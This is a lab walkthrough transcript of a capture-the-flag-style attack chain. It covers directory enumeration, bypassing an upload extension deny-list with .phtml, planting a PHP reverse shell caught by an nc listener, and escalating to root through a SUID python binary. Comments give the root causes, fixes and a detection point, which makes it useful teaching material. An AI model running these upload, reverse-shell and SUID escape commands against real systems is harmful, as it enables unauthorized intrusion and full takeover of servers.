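# Walkthrough transcript: unrestricted file upload -> web shell -> SUID
# privilege escalation on a lab target. These are commands typed step by
# step (Steps 1-4 on the tester's machine, Steps 5-7 inside the received
# shell), not a script to run unattended: the listener in Step 4 blocks.
# TARGET_IP is a placeholder.

# Step 1: Scan
nmap -sV TARGET_IP
# 22 SSH, 80 HTTP

# Step 2: Directory Enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /panel (upload form)
# Found: /uploads (where files go)

# Step 3: Upload Bypass
# .php is blocked, try alternatives:
# .php5, .phtml, .phar, .php7

# Create PHP reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.phtml
# Edit: Change IP and PORT

# Upload shell.phtml - SUCCESS!
# Root cause: the filter is a deny-list on the literal ".php" extension,
# while the server still treats .phtml as PHP. The fix is an allow-list of
# expected upload types plus no script execution for anything under /uploads.

# Step 4: Get Reverse Shell
nc -lvnp 4444

# Trigger: http://TARGET_IP/uploads/shell.phtml
# Shell received!
# Detection point: a request for a script-like file under /uploads followed
# by an outbound connection from the web server process.

# Step 5: Stabilize Shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z, then: stty raw -echo; fg

# Step 6: Find User Flag
find / -name "user.txt" 2>/dev/null
cat /var/www/user.txt

# Step 7: SUID Privesc
find / -perm -u=s -type f 2>/dev/null
# Found: /usr/bin/python
# Root cause: a general-purpose interpreter carries the SUID bit, so any
# local user can run code as the file's owner. The same find command works
# as an audit; interpreters should never appear in its output.

# Python SUID escape
/usr/bin/python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

# Root!
cat /root/root.txt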